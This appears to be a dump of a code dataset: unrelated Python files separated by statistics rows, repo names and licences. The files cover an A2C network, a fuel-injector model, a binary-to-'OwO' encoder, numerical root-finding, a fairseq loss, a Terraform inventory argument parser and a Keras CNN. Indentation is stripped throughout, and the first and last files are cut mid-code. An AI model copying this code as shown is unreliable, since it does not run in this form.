def _build_params(self, num_input_channels):
with tf.name_scope('initializers'):
# values of the initializers taken from original a2c implementation
weights_initializer = tf.orthogonal_initializer(np.sqrt(2.), dtype=tf.float32)
bias_initializer = tf.zeros_initializer(dtype=tf.float32)
policy_weights_initializer = tf.orthogonal_initializer(0.01, dtype=tf.float32)
baseline_weights_initializer = tf.orthogonal_initializer(1., dtype=tf.float32)
with tf.variable_scope('conv1'):
conv1_num_filters = 32
conv1_filter_extent = 8
self._params['conv1'] = nn.conv2d_params(
num_input_channels, conv1_num_filters, conv1_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv2'):
conv2_num_filters = 64
conv2_filter_extent = 4
self._params['conv2'] = nn.conv2d_params(
conv1_num_filters, conv2_num_filters, conv2_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv3'):
conv3_filter_extent = 3
self._params['conv3'] = nn.conv2d_params(
conv2_num_filters, self._conv3_num_filters, conv3_filter_extent, tf.float32,
weights_initializer, bias_initializer)
conv3_flat_size = 49 * self._conv3_num_filters # TODO don't hardcode
with tf.variable_scope('fc4'):
fc4_output_size = 512
self._params['fc4'] = nn.fully_connected_params(
conv3_flat_size, fc4_output_size, tf.float32, weights_initializer, bias_initializer)
with tf.variable_scope('fc_policy'):
self._params['fc_policy'] = nn.fully_connected_params(
fc4_output_size, self._num_actions, tf.float32, policy_weights_initializer, bias_initializer)
with tf.variable_scope('fc_baseline'):
self._params['fc_baseline'] = nn.fully_connected_params(
fc4_output_size, 1, tf.float32, baseline_weights_initializer, bias_initializer)
# noinspection PyShadowingBuiltins
def _build_layers(self, input, build_policy):
preactivations = dict()
activations = dict()
with tf.variable_scope('conv1', reuse=True):
conv1_pre = nn.conv2d(input, self._params['conv1'], stride=4, padding='VALID')
conv1 = tf.nn.relu(conv1_pre)
preactivations['conv1'] = conv1_pre
activations['conv1'] = conv1
with tf.variable_scope('conv2', reuse=True):
conv2_pre = nn.conv2d(conv1, self._params['conv2'], stride=2, padding='VALID')
conv2 = tf.nn.relu(conv2_pre)
preactivations['conv2'] = conv2_pre
activations['conv2'] = conv2
with tf.variable_scope('conv3', reuse=True):
conv3_pre = nn.conv2d(conv2, self._params['conv3'], stride=1, padding='VALID')
conv3 = tf.nn.relu(conv3_pre)
preactivations['conv3'] = conv3_pre
with tf.name_scope('flat'):
conv3_flat = nn.flatten(conv3)
activations['conv3'] = conv3_flat
with tf.variable_scope('fc4', reuse=True):
fc4_pre = nn.fully_connected(conv3_flat, self._params['fc4'])
fc4 = tf.nn.relu(fc4_pre)
preactivations['fc4'] = fc4_pre
activations['fc4'] = fc4
if build_policy:
with tf.variable_scope('fc_policy', reuse=True):
fc_policy = nn.fully_connected(fc4, self._params['fc_policy'])
activations['fc_policy'] = fc_policy
with tf.variable_scope('fc_baseline', reuse=True):
fc_baseline = nn.fully_connected(fc4, self._params['fc_baseline'])
activations['fc_baseline'] = fc_baseline
return preactivations, activations
def register_layers(self, layer_collection):
"""Registers the layers of this model (neural net) in the specified :obj:`kfac.LayerCollection`
(required for K-FAC).
Args:
layer_collection (:obj:`kfac.LayerCollection`):
A layer collection used by the :obj:`~kfac.KfacOptimizer`.
"""
layer_collection.register_conv2d(
self._params['conv1'], strides=[1, 4, 4, 1], padding='VALID',
inputs=self._flat_observations, outputs=self._preactivations['conv1'])
layer_collection.register_conv2d(
self._params['conv2'], strides=[1, 2, 2, 1], padding='VALID',
inputs=self._activations['conv1'], outputs=self._preactivations['conv2'])
layer_collection.register_conv2d(
self._params['conv3'], strides=[1, 1, 1, 1], padding='VALID',
inputs=self._activations['conv2'], outputs=self._preactivations['conv3'])
layer_collection.register_fully_connected(
self._params['fc4'], inputs=self._activations['conv3'], outputs=self._preactivations['fc4'])
layer_collection.register_fully_connected(
self._params['fc_policy'], inputs=self._activations['fc4'], outputs=self._activations['fc_policy'])
layer_collection.register_fully_connected(
self._params['fc_baseline'], inputs=self._activations['fc4'], outputs=self._activations['fc_baseline'])
| 46.246964
| 119
| 0.660597
| 1,344
| 11,423
| 5.37872
| 0.186756
| 0.02075
| 0.025176
| 0.034168
| 0.27611
| 0.181353
| 0.135565
| 0.087011
| 0.052704
| 0.044958
| 0
| 0.025163
| 0.248534
| 11,423
| 246
| 120
| 46.434959
| 0.816985
| 0.269281
| 0
| 0.068702
| 0
| 0
| 0.064225
| 0.005445
| 0
| 0
| 0
| 0.004065
| 0.015267
| 1
| 0.030534
| false
| 0
| 0.053435
| 0
| 0.099237
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb151ddaf6fe45b7776879d93b6a4036ec2ff77
| 2,863
|
py
|
Python
|
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
import copy
import numpy as np
from compressible_tools import *
class FuelInjector:
"""A fuel injector.
Parameters
----------
fuel : Species
The fluid being fed through the injector.
T : float
Inlet temperature of injector.
A : float
Cross-sectional area.
"""
def __init__(self, fuel, T, A):
# Store
self.fuel = fuel
self.T = T
self.A = A
def calc_subcritical_injector_pressure(self, m_dot, p_ext):
"""Calculates the required pressure in the injector to supply the given massflow against the given exterior pressure. Assumes the injector is subsonic but compressible.
Parameters
----------
m_dot : float
Required massflow.
p_ext : float
Exterior pressure.
Returns
-------
p_inj : float
Required injector pressure.
"""
# Define function to find the root of
def f(p_inj):
return self.subcritical_massflow(p_inj, p_ext)-m_dot
# Find root using secant method
p0 = p_ext*1.1
p1 = p_ext*1.2
f0 = f(p0)
f1 = f(p1)
while abs(f1/m_dot)>1e-12:
# Get new pressure guess
p2 = p1-f1*(p0-p1)/(f0-f1)
# Update for next iteration
p0 = p1
p1 = p2
f0 = f1
f1 = f(p1)
# Check the result is subcritical
p_crit = (0.5*(self.fuel.gamma+1.0))**(self.fuel.gamma/(self.fuel.gamma-1.0))*p_ext
if p1 >= p_crit:
raise RuntimeError("Subcritical assumption of injector violated. Critical pressure is {0:1.6e}".format(p_crit))
return p1, p_crit
def subcritical_massflow(self, p_inj, p_ext):
"""Gives the massflow through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
p_inj : float
Injector pressure.
Returns
-------
m_dot : float
Massflow.
"""
a = (p_ext/p_inj)**(2.0/self.fuel.gamma)-(p_ext/p_inj)**((self.fuel.gamma+1.0)/self.fuel.gamma)
b = p_inj**2/(self.fuel.R_g*self.T)*a
c = 2.0*self.fuel.gamma/(self.fuel.gamma-1.0)*b
return self.A*np.sqrt(c)
def calc_velocity(self, p_inj, p_ext):
"""Gives the velocity through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
p_inj : float
Injector pressure.
Returns
-------
V : float
Velocity
"""
# Calculate massflow
m_dot = self.subcritical_massflow(p_inj, p_ext)
# Calculate density
rho = p_inj/(self.fuel.R_g*self.T)
return m_dot/(rho*self.A)
| 24.895652
| 176
| 0.550472
| 373
| 2,863
| 4.096515
| 0.294906
| 0.062827
| 0.068063
| 0.020942
| 0.311518
| 0.301047
| 0.281414
| 0.21466
| 0.187173
| 0.149215
| 0
| 0.026036
| 0.342648
| 2,863
| 115
| 177
| 24.895652
| 0.785866
| 0.389801
| 0
| 0.058824
| 0
| 0
| 0.051389
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0
| 0.088235
| 0.029412
| 0.382353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb26810722dea2343152102b81238f0ece5d0c5
| 1,976
|
py
|
Python
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 4
|
2020-08-10T06:01:35.000Z
|
2021-08-30T02:26:29.000Z
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | null | null | null |
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 1
|
2021-06-02T09:16:43.000Z
|
2021-06-02T09:16:43.000Z
|
#!/usr/bin/env python3
# owoencode.py, a part of owoencoder
# Made by Glitch, 2020
# https://www.glitchfur.net
from sys import argv, stdout, stderr
from os.path import exists, split
from os import remove
KEEP_ORIG = False
STDOUT_FLAG = False
def main():
if len(argv) < 2:
print("The syntax for running this script is as follows:")
print("python owoencode.py [-kc] <original_file> [ ... ]")
exit(0)
in_fns = argv[1:]
# There is probably a better way to handle parameters. But considering
# there are only two, I'm not too worried about it right now.
for param in in_fns:
if param.startswith("-"):
global KEEP_ORIG
global STDOUT_FLAG
if "k" in param:
KEEP_ORIG = True
if "c" in param:
STDOUT_FLAG = True
KEEP_ORIG = True # Output going to stdout, keep original file
in_fns.remove(param)
for fn in in_fns:
if not exists(fn):
print("%s: No such file or directory" % fn, file=stderr)
exit(1)
if exists("%s.owo" % fn):
print("%s: Encoding would cause a naming conflict " \
"with an existing file, ignoring" % fn)
in_fns.remove(fn)
out_fns = ["%s.owo" % fn for fn in in_fns]
for i in range(len(in_fns)):
encode(in_fns[i], out_fns[i])
def encode(in_fn, out_fn):
in_fp = open(in_fn, "rb")
if STDOUT_FLAG == False:
out_fp = open(out_fn, "w")
else:
out_fp = stdout
while True:
in_buffer = in_fp.read(1048576) # read 1MB at a time
if not in_buffer:
break
out_buffer = ''.join([bin(byte)[2:].zfill(8) for byte in in_buffer])
out_fp.write(out_buffer.replace("1", "OwO").replace("0", "UwU"))
in_fp.close()
if STDOUT_FLAG == False:
out_fp.close()
if KEEP_ORIG == False:
remove(in_fn)
if __name__ == "__main__":
main()
| 30.875
| 77
| 0.577935
| 292
| 1,976
| 3.753425
| 0.434932
| 0.036496
| 0.041058
| 0.016423
| 0.062044
| 0.040146
| 0
| 0
| 0
| 0
| 0
| 0.015373
| 0.308704
| 1,976
| 63
| 78
| 31.365079
| 0.786969
| 0.148785
| 0
| 0.078431
| 0
| 0
| 0.140382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.058824
| 0
| 0.098039
| 0.078431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb31209b87b0007cddea5b09c524bff1b45d36d
| 2,589
|
py
|
Python
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | 2
|
2018-10-09T09:59:45.000Z
|
2021-11-21T17:01:47.000Z
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
# Fix number of node predicates at 1 out of 6
# this ensures queries with larger space of possible nodes
# The number of colors in a query is varied from 1 to 5
import argparse
import numpy as np
from graph_gen import birth_years, genders, num_posts, num_friends
possibilities = [1, 3, 4, 5]
# do not consider equaliy as it will narrow down
# extreme node sets too much
op1 = ["<=", "<", ">", ">="]
op2 = ["==", "!="]
def construct_predicate():
# attribute 2 & 6 should never be considered
orig_query = ["__"] * 6
# num_preds = np.random.choice([0, 1, 2, 3])
num_preds = 3
selected_predicates = np.random.choice(possibilities, num_preds, replace=False)
for predicate in selected_predicates:
query = ""
if predicate == 1:
# birth_year
op_value = np.random.choice(birth_years)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 3:
# sex
op_value = np.random.choice(genders)
op = np.random.choice(op2)
query += str(op)
query += str(op_value)
elif predicate == 4:
# posts
op_value = np.random.choice(num_posts)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 5:
# friends
op_value = np.random.choice(num_friends)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
orig_query[predicate - 1] = query
return "".join(orig_query)
def construct_regex():
colors = ['a', 'b', 'c', 'd', 'e', 'f']
# some parameters to fix for queries
max_colors = 4
max_len = 8
ops = ["", "<="]
# reg_len = np.random.randint(1, max_colors + 1)
reg_len = 3
np.random.shuffle(colors)
regex = ""
for color in colors[:reg_len]:
regex += color
op = np.random.choice(ops)
if op != "<=":
regex += op
else:
regex += op
regex += str(np.random.randint(2, max_len + 1))
return regex
def construct_query():
pred1 = construct_predicate()
pred2 = construct_predicate()
regex = construct_regex()
return pred1 + " " + pred2 + " " + regex
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--Q", type=int, default=10)
args = parser.parse_args()
print(args.Q)
for i in range(args.Q):
print(construct_query())
if __name__ == "__main__":
main()
| 27.83871
| 83
| 0.565469
| 332
| 2,589
| 4.259036
| 0.358434
| 0.079208
| 0.108911
| 0.056577
| 0.202263
| 0.17256
| 0.138614
| 0.138614
| 0.138614
| 0.11174
| 0
| 0.022384
| 0.309772
| 2,589
| 92
| 84
| 28.141304
| 0.768886
| 0.164156
| 0
| 0.2
| 0
| 0
| 0.016279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.046154
| 0
| 0.153846
| 0.030769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb5ce60435e8b3c83936754903becf1fcb4fbdf
| 1,292
|
py
|
Python
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | 11
|
2020-03-24T15:29:46.000Z
|
2022-03-11T23:14:48.000Z
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
import string
from django.template import Context
from django.template.loader import get_template
from django import template
register = template.Library()
import crm
@register.inclusion_tag('comments/form.html')
def render_cedar_comment_form(**kwargs):
object = kwargs.pop('object', None)
parent_id = kwargs.pop('parent_id', None) # id of parent comment
if object is None:
raise AssertionError("object kwarg cannot be None")
else:
return {
'object': object,
'parent_id': parent_id
}
#
# response = {
# 'element_id': kwargs.pop('element_id', None),
# 'data': data,
# 'related_object': related_object,
# 'include_toolbar': kwargs.pop('include_toolbar', True)
# }
return response
# @register.filter
# def render_related_communication_items(related_object):
# '''
# Called by the CommunicationViewset
# to render data if html is requested.
# :param related_object:
# :return: rendered communication items list (<ul>)
# '''
# comms_objects = Communication.get_communications_related_to(related_object)
# context = Context({'data': comms_objects})
# t = get_template("communication/communication_items.html")
# return t.render(context)
| 28.711111
| 81
| 0.670279
| 147
| 1,292
| 5.70068
| 0.408163
| 0.077566
| 0.042959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.220588
| 1,292
| 44
| 82
| 29.363636
| 0.832175
| 0.517802
| 0
| 0
| 0
| 0
| 0.124585
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.055556
| false
| 0
| 0.277778
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb6bce0846f3ad5fdbe2619d6c7b2dd5348269a
| 3,504
|
py
|
Python
|
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import math
import torch
import torch.nn.functional as F
from fairseq import utils
from . import FairseqCriterion, register_criterion
@register_criterion('cross_entropy')
class CrossEntropyCriterion(FairseqCriterion):
def __init__(self, args, task):
super().__init__(args, task)
self.task = task
def forward(self, model, sample, reduce=True):
"""Compute the loss for the given sample.
Returns a tuple with three elements:
1) the loss
2) the sample size, which is used as the denominator for the gradient
3) logging outputs to display while training
"""
# import pdb
# pdb.set_trace()
net_output = model(**sample['net_input'])
lprobs = model.get_normalized_probs(net_output, log_probs=True)
lprobs = lprobs.view(-1, lprobs.size(-1))
target = model.get_targets(sample, net_output).view(-1)
loss = F.nll_loss(lprobs, target, size_average=False, ignore_index=self.padding_idx,
reduce=reduce)
sample_size = sample['target'].size(0) if self.args.sentence_avg else sample['ntokens']
logging_output = {
'loss': utils.item(loss.data) if reduce else loss.data,
'ntokens': sample['ntokens'],
'nsentences': sample['target'].size(0),
'sample_size': sample_size,
}
# 测试查看:运行时刻模型输出分布最大概率采样产生的目标语言序列
# tgt = sample['target']
# hypo = torch.max(lprobs,1)[1].reshape(*tgt.shape)
# print(tgt, hypo, sep="\n")
# tgt_str = self.task.tgt_dict.string(tgt, True, escape_unk=True)
# hypo_str = self.task.tgt_dict.string(hypo, True, escape_unk=True)
# pre_str = self.task.tgt_dict.string(sample['net_input']['prev_output_tokens'], True, escape_unk=True)
# for t,h,p in zip(tgt_str.split("\n"),hypo_str.split("\n"),pre_str.split("\n")):
# print(f"T: {t}")
# print(f"H: {h}")
# print(f"P: {p}")
# print("-"*20)
# from fairseq.sequence_generator import SequenceGenerator
# translator = SequenceGenerator(
# [model], self.task.target_dictionary, beam_size=5)
# print("-"*20, "by sequence generator", "-"*20)
# print(translator.generate_by_a_sample(sample))
# import pdb
# pdb.set_trace()
return loss, sample_size, logging_output
@staticmethod
def aggregate_logging_outputs(logging_outputs):
"""Aggregate logging outputs from data parallel training."""
loss_sum = sum(log.get('loss', 0) for log in logging_outputs)
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)
sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)
agg_output = {
'loss': loss_sum / sample_size / math.log(2),
'ntokens': ntokens,
'nsentences': nsentences,
'sample_size': sample_size,
}
if sample_size != ntokens:
agg_output['nll_loss'] = loss_sum / ntokens / math.log(2)
return agg_output
| 37.276596
| 111
| 0.623002
| 447
| 3,504
| 4.720358
| 0.342282
| 0.052133
| 0.017062
| 0.017062
| 0.096682
| 0.077725
| 0
| 0
| 0
| 0
| 0
| 0.010413
| 0.259989
| 3,504
| 93
| 112
| 37.677419
| 0.803317
| 0.384703
| 0
| 0.05
| 0
| 0
| 0.073147
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075
| false
| 0
| 0.125
| 0
| 0.275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbb87c6ab776c79d599ae4c17e47909e935b3eb
| 3,845
|
py
|
Python
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/University-ITMO
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | 3
|
2021-10-13T05:01:37.000Z
|
2022-01-21T15:25:47.000Z
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
from copy import copy
from modules.parse import parse
from modules.equation import grad, node_flatten
from modules.matrix import Matrix
from modules.util import ProjectException
from modules.util import Color, color_string
def split_half(data: dict) -> dict:
node_root = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
range_min = data["data"]["range_min"]
range_max = data["data"]["range_max"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED,
"Key not found!(should be present range_min, range_max, iterations)"))
fval_range_min = node_root.calculate({var_list[0]: range_min})
fval_range_max = node_root.calculate({var_list[0]: range_max})
if (sum([fval_range_min > 0, fval_range_max > 0]) != 1):
return {"error": "Invalid arguments. Function values of borders are same sigh"}
for _ in range(iterations):
range_med = (range_max + range_min) / 2
fval_range_med = node_root.calculate({var_list[0]: range_med})
if (sum([fval_range_med > 0, fval_range_min > 0]) == 1):
range_max = range_med
else:
range_min = range_med
return {"result": {"range_min": range_min, "range_max": range_max}}
def tangent(data: dict) -> dict:
node = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
x_0 = data["data"]["x_0"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
f = node.calculate({var_list[0]: x_0})
f_ll = grad(grad(node_flatten(node, {"x": x_0}, "x")))(x_0)
if (f * f_ll <= 0):
return {"error": "Invalid arguments. Derivative'' * func <= 0. Iteration process doesn't converge"}
x_prev = x_0
for _ in range(iterations):
f_x = node.calculate({var_list[0]: x_prev})
f_x_l = grad(node_flatten(node, {"x": x_prev}, "x"))(x_prev)
x_prev -= f_x / f_x_l
return {"result": x_prev}
def simple_iteration(data: dict) -> dict:
node_list = data["parse"]
equation_list = []
for i in range(node_list):
equation_list.append(str(node_list[i]))
node_list = []
try:
iterations = data["data"]["iterations"]
x0_dict = data["data"]["x_0"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
x0_dict_keys = list(x0_dict.keys())
assert(len(x0_dict_keys) == len(equation_list))
for i in range(len(equation_list)):
equation_list[i] = "-1 * (" + equation_list[i] + "-" + x0_dict_keys[i] + ")"
n, v = parse.parse_expression(equation_list[i])
node_list.append(n)
matrix_phi = Matrix(len(equation_list), len(x0_dict_keys))
# check convergence
for i in range(matrix_phi.rows):
for j in range(matrix_phi.columns):
matrix_phi[i][j] = grad(node_flatten(node_list[i], x0_dict, x0_dict_keys[j]))(x0_dict[x0_dict_keys[j]])
norm = max([sum([matrix_phi[i][j] for j in range(matrix_phi.columns)]) for i in range(matrix_phi.rows)])
if (norm >= 1):
return {"error" : "This equations for those basic arguments are not convergent"}
x0_dict_prev = copy(x0_dict)
for _ in range(iterations):
for i in range(len(node_list)):
x0_dict[x0_dict_keys[i]] = node_list[i].calculate(x0_dict_prev)
x0_dict_prev = copy(x0_dict)
return {"values": x0_dict_prev}
| 40.904255
| 115
| 0.640312
| 564
| 3,845
| 4.117021
| 0.177305
| 0.046512
| 0.034453
| 0.068906
| 0.422481
| 0.408269
| 0.319552
| 0.236865
| 0.236865
| 0.236865
| 0
| 0.016399
| 0.222887
| 3,845
| 93
| 116
| 41.344086
| 0.76071
| 0.004421
| 0
| 0.275
| 0
| 0
| 0.161265
| 0
| 0
| 0
| 0
| 0
| 0.0125
| 1
| 0.0375
| false
| 0
| 0.075
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbc104c7579cd278f56fcd197e11d8c1c44ade6
| 1,807
|
py
|
Python
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 5
|
2018-07-17T15:46:57.000Z
|
2020-01-18T23:54:23.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 11
|
2018-07-19T13:04:50.000Z
|
2019-10-22T13:38:01.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 4
|
2019-09-27T18:27:17.000Z
|
2021-12-22T13:41:03.000Z
|
import argparse
from _version import __version__
def parse():
"""Parse command line arguments."""
PARSER = argparse.ArgumentParser()
PARSER.add_argument('-b', '--backend',
help='Define which Terraform backend to parse',
choices=['local', 'consul'], default='local')
PARSER.add_argument('-cH', '--consulHost',
help='Define Consul host when using Consul backend')
PARSER.add_argument('-cKV', '--consulKV',
help='Define Consul KV Pair to query. Ex. Azure/Test')
PARSER.add_argument('-cP', '--consulPort',
help='Define Consul host port', default='8500')
PARSER.add_argument('-cS', '--consulScheme',
help='Define Consul connection scheme.',
choices=['http', 'https'], default='http')
PARSER.add_argument('-i', '--inventory', help='Ansible inventory',
default='./terraform_inventory.yml')
PARSER.add_argument('--logLevel', help='Define logging level output',
choices=['CRITICAL', 'ERROR', 'WARNING',
'INFO', 'DEBUG'], default='INFO')
PARSER.add_argument('-t', '--tfstate', help='Terraform tftstate file',
default='./terraform.tfstate')
PARSER.add_argument('-v', '--version', action='version',
version='%(prog)s {version}'.format(version=__version__))
ARGS = PARSER.parse_args()
if ARGS.backend == 'consul' and ARGS.consulHost is None:
PARSER.error('Consul host is required when using Consul backend.')
if ARGS.backend == 'consul' and ARGS.consulKV is None:
PARSER.error('Consul KV pair is required when using Consul backend')
return ARGS
| 51.628571
| 81
| 0.58052
| 187
| 1,807
| 5.502674
| 0.406417
| 0.078717
| 0.148688
| 0.06414
| 0.157434
| 0.112731
| 0
| 0
| 0
| 0
| 0
| 0.003063
| 0.277255
| 1,807
| 34
| 82
| 53.147059
| 0.784839
| 0.016049
| 0
| 0
| 0
| 0
| 0.348194
| 0.014108
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.064516
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbcd4f337d7fb85d3b0e527567a1d3d85e5d0ed
| 1,928
|
py
|
Python
|
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
# importing libraries
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras import backend as K
img_width, img_height = 224, 224
train_data_dir = 'v_data/train'
validation_data_dir = 'v_data/test'
nb_train_samples = 400
nb_validation_samples = 100
epochs = 10
batch_size = 16
if K.image_data_format() == 'channels_first':
input_shape = (3, img_width, img_height)
else:
input_shape = (img_width, img_height, 3)
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape = input_shape))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Conv2D(32, (2, 2)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
